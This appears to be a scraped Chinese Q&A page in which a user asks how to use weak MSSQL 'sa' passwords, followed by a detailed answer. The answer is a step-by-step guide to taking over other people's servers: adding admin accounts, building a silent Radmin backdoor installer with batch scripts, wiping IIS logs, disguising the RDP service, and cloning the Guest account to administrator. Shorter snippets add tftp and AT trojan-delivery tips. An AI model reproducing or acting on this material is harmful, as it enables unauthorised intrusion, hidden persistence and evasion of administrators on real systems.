别人送我几个SA弱口令，要怎么连接啊？

什么是SA权限？~

　　SA权限：一般SQL数据库默认管理帐号，等同于系统超级管理员。一般SQL数据库是不要设置这个权限帐号，否则如果程序出现注入漏洞那么这台服务器就可能被控制。
　　SA权限（即 SYSTEM 和ADMIN的缩写）是msSQL数据库的默认系统帐户，具有最高权限。
　　第一次安装MSSQL时，如果没有或过于简单的设置了SA的密码，别人就很容易猜解密码。
　　通过SOL连接器等工具连接到1433（MSSQL默认端口），利用扩展存储过程执行系统命令。

下个查询分析器或者mssql的连接器，输入ip及sa账户密码就可以连接了，连接后执行net user添加管理员用户就能远程桌面连接了

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隐藏3389服务及 不让管理发现自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（开3389端口服务的）；psu.exe（使用被禁止的Guest帐户要用到的）；mstsc.exe（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe；

2、在本地设置服务端（一定要生成）；

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg；

4、编写一个批处理，并命名为u.bat；

@echo offnet stop r_server

5、写第二个批处理，r.bat,内容为：

@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包；

7、将Rad.rar制作成自解压文件；

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

四.用RADMIN客服端连接

上传文件到c:\\WINNT(XP是windows):

port.bat(如果是在XP下，这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门RADMIN进入TELNET。

运行c:\\winnt\\3389.exe，重启肉鸡。

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题。

使用3389登陆，发现登陆用户已满，不用怕，我们把他踢出去。

telnet对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint，telnet对方ip，直接可以登陆对方电脑了。

使用命令：

c:\\query user (查看对方目前终端登陆状况。)

运行命令：

c:\\logoff 1(踢出去一个管理者)

再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\\winnt\\log . 自己的IP .(擦PP)

c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

if exists (select * from dbo.sysobjects where id
= object_id(N\’[dbo].[xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO

按F5(运行)，关了退出SQL Server再用SQL Server身位验证进一次，退出(这是为了不留下记录)。
八.改3389端口和服务名称

修改服务器端的端口设置，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]，PortNumber值，默认是3389，选择10进制，修改成所希望的端口，比如1314。

第二个地方：

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　PortNumber值，默认是3389，选择10进制，修改成所希望的端口，比如1314。

要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]

的键值为mm.reg文件。编辑mm.reg文件，替换TermService为Alerter(错误警告服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明，改为你所换的服务说明，这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称，改为你所换的服务名称，这里改为Alerter)。保存，再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)。

再在CMD下

CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)用Radmin重启肉鸡

十.使用被禁用的帐户[Guest]登陆，删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。

如：psu –p regedit –i 157

将Guest克成管理员权限，克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值。

在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相应的类型值的数据)，然后删除Guest的配置。

2.查看计算机管理中帐户列表，刷新这时候会出现错误[找不到帐户](跳过这步也行)。

3.将Guest的配置(二个REG文件导进注册表)。

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。

net user Guest ****
[修改密码]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用。

6.用Guest登陆后删除自己建的帐号。

net user mint /del

整个过程结束。

最后最好把RADMIN的服务也改了，多留个后门多条路，呵呵。整个过程全部结束，这机子就真正变成你的肉鸡了

直接用sqltools连接就可以了，然后建立用户，至于开3389那就是个人爱好了一般的有SA弱口令的机器上，估计马、客户……不会少，你可以帮他清理一下，自己留一个隐蔽点的后门。把机器弄干净点，不要破坏和随意修改。很多朋友都认为SA弱口令的机器，就像菜市场，不必清除脚印，不过我个人认为还是清除的比较好一些，有时候，一些小的服务器，由于管理员懒，或者本身不是没有重要资料，所以不去修改密码或打补丁。并不代表他不看这些东西。如果比较稳定的服，可以花点心思帮他维护~。。~

S一般别人给你弱口令的计算机都是有其他顾客的，所以你不要去登录了，那样只是徒劳

有关黑客的问题
答：·在sql的sa弱口令,可以用sql连接器直接 ·登陆 后门木马 ·如果有ipc$共享,可以copy过去木马后门 ·用at启动 ·AT \ip time /INTERACTIVE ·如果可以得到shell,也可以用tftp ·Tftp.exe –i ip get *.* *.* ·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行 密码破解 ·远程破解mysql,ms...

用瑞星防火墙可以有效防止扫描弱口令么
答：不仅是黑客，蠕虫病毒也常常利用弱口令让它们在局域网或广域网中畅快爬行，所以把系统管理员账号加一个强的密码是一个非常良好使用习惯。瑞星防火墙“漏洞扫描”功能会提示系统在每次登陆的时候会显示上一次登陆的用户的用户名，入侵者很可能会根据被显示出来的用户名获取登陆密码并且非法进入系统。并给出修复...

安装了Microsoft SQL Server 2000后,为什么我的电脑自动设置命名为sun...
答：1.产生SQLDebugger账户是正常的 SQL安装后一般都会有这个账户，用作调试功能，一般不用。删除无影响。2，产生SUN的原因有两种；一是 在安装后 你安装的其他使用SQL SERVER的软件创建了这个账户， 二是未指定SA密码，造成弱口令漏洞，被人入侵添加账号，删除也无影响。3.如果无法删除 就直接禁用即可。

怎么攻击电脑?
答：如果要是入侵对方的电脑 这个更麻烦 查到对方IP 然后还需要扫描对方电脑的弱口令 进行猜解等等 一般对方电脑如果开启1433、3389、135等这些高危端口 也是比较容易入侵的 不过我说的这两种是很麻烦的 还是建议你不要考虑这些了 问题四:怎么用CMD攻击个人电脑? 64132是端口号 搞小破坏方法不建议使用,如果想开个...

电脑用(运行)怎么检测电脑联网了么,还有些基本检测功能
答：另外大家应该清楚,任何人要想进入系统,必须得有一个合法的用户名和密码(输入法漏洞差不多绝迹了吧),哪怕你拿到帐户的只有一个很小的权限,你也可以利用它来达到最后的目的。所以坚决消灭空口令,给自己的帐户加上一个强壮的密码,是最好的防御弱口令入侵的方法。 培养良好的安全意识才是最重要的。 IPsec有两种模式...

有个IP开放 21 1433 3899 的端口怎么入侵
答：找出你的IP 然后去另外一台电脑 接着开始--运行--cmd--输入telnet 你的IP（注意：中间telnet 与 IP 之间有个空格）看看连得上不 连不上就说明21端口没问题 你1433端口用X-SCAN3.3扫下自己的IP 看看1433有弱口令不 没有也没问题 关于3389 开了3389端口 别人就一定可以用远程桌面连接连接你 ...

网络管理员账号怎么离线
答：下面列出了几种与 ICMP 协议相关的攻击类型：ICMP DOS 攻击：攻击者使用 ICMP “时间超出”或“目标地址无法连接”的消息。这两种 ICMP 消息都会导致一台主机迅速放弃连接。攻击只需伪造这些 ICMP 消息中的一条，并发送给通信中的两台主机或其中的一台，就可以利用这种攻击了。接着通信连接就会被切断。

怎么才能成为电脑高手
答：·在sql的sa弱口令,可以用sql连接器直接 ·登陆 后门木马 ·如果有ipc$共享,可以copy过去木马后门 ·用at启动 ·AT \ip time /INTERACTIVE ·如果可以得到shell,也可以用tftp ·Tftp.exe –i ip get *.* *.* ·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行 密码破解 ·远程破解mysql,ms...

简述入侵检测常用的四种方法
答：入侵检测系统所采用的技术可分为特征检测与异常检测两种。1、特征检测 特征检测(Signature-based detection) 又称Misuse detection ，这一检测假设入侵者活动可以用一种模式来表示，系统的目标是检测主体活动是否符合这些模式。它可以将已有的入侵方法检查出来，但对新的入侵方法无能为力。其难点在于如何设计...

拒绝了对对象 'xp_cmdshell'(数据库 'master',所有者 'dbo')的 EXECUT...
答：下面我就具体演示一下我是怎么对付这样的情况的。用到的工具：sql查询分离器休闲庄专用版。怕大家找不到，我把下载地址给大家 SQL查询分析器休闲庄分离版本 http://soft.7747.net/ware/774710/sqlquery.zip 假如我们扫到了：[219.84.135.161]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]"[...